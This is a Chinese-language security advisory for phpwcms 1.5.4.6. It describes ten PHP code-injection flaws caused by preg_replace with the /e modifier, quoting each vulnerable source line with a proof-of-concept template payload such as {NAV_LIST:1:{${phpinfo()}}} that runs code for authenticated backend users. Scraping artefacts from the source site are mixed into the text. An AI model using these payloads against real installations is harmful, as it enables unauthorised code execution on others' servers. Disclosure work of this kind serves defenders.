phpwcms 'preg_replace()'多个远程PHP代码注入漏

phpwcms是开源内容管理系统。

 

phpwcms  1.5.4.6及其他版本在实现上存在多个代码注入 漏洞 ，通过身份验证的远程攻击者可以用"backend user"\"admin user"\"backend user"账户利用这些漏洞（"frontend user"账户不能利用这些漏洞）在受影响计算机内执行任意 PHP 脚本代码。

 

测试方法:

 

1. Lines 699-700 of ./include/inc_front/content.func.inc.php:

-------------------------------------------------------------

 

// list based navigation starting at given level

$replace = 'nav_list_struct($content["struct"],$content["cat_id"],"$1", "$2");';

$content["all"] = preg_replace('/\{NAV_LIST:(\d+):{0,1}(.*){0,1}\}/e', $replace, $content["all"]);

 

PoC:

{NAV_LIST:1:{${phpinfo()}}}

 

2. Line 704 of ,.include/inc_front/content.func.inc.php:

--------------------------------------------------------

 

$content["all"] = preg_replace('/\{NAV_LIST_TOP:(.*?):(.*?)\}/e', 'css_level_list($content["struct"], $content["cat_path"], 0, "$1", 1, "$2")', $content["all"]);

 

PoC:

{NAV_LIST_TOP:{${phpinfo}}:1}

 

3. line 708 of ./include/inc_front/content.func.inc.php:

--------------------------------------------------------

 

$content["all"] = preg_replace('/\{NAV_LIST_CURRENT:(\d+):(.*?):(.*?)\}/e', 'css_level_list($content["struct"],$content["cat_path"],$content["cat_id"],"$2","$1","$3")', $content["all"]);

 

PoC:

{NAV_LIST_CURRENT:1:{${phpinfo()}}:1}

 

4. Line 792 of ./include/inc_front/content.func.inc.php:

--------------------------------------------------------

 

$content["all"] = preg_replace('/\{BROWSE:NEXT:(.*?):(0|1)\}/e','get_index_link_next("$1",$2);',$content["all"]);

 

PoC:

{BROWSE:NEXT:{${phpinfo()}}:1}

 

5. Line 793 of ./include/inc_front/content.func.inc.php:

--------------------------------------------------------

 

$content["all"] = preg_replace('/\{BROWSE:PREV:(.*?):(0|1)\}/e','get_index_link_prev("$1",$2);',$content["all"]);

 

PoC:

{BROWSE:PREV:{${phpinfo()}}:1}

 

6. Line 2661 of ./include/inc_front/front.func.inc.php:

-------------------------------------------------------

 

$text = preg_replace('/\{LIVEDATE:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$livedate.'")', $text);

 HdhCmsTest2cto测试数据

PoC:

{LIVEDATE:{${phpinfo()}} lang=ru}

 

7. Line 2658 of ./include/inc_front/front.func.inc.php:

-------------------------------------------------------

 

$text = preg_replace('/\{DATE:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$date.'")', $text);

 

PoC:

{DATE:{${phpinfo()}} lang=ru}

 

8. Line 2665 of ./include/inc_front/front.func.inc.php:

-------------------------------------------------------

 

$text = preg_replace('/\{KILLDATE:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$killdate.'")', $text);

 

PoC:

{KILLDATE:{${phpinfo()}} lang=ru}

 

9. Line 2668 of ./include/inc_front/front.func.inc.php:

-------------------------------------------------------

 

return preg_replace('/\{NOW:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.now().'")', $text);

 

PoC:

{NOW:{${phpinfo()}} lang=ru}

 

10. Line 2674 of ./include/inc_front/front.func.inc.php:

--------------------------------------------------------

 

$text = preg_replace('/\{'.$rt.':(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$date.'")', $text);

 

PoC:

{DATE:{${phpinfo()}} lang=ru}

安全建议:

 

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

 

http://HdhCmsTestphpwcms.de/

查看更多关于phpwcms 'preg_replace()'多个远程PHP代码注入漏的详细内容...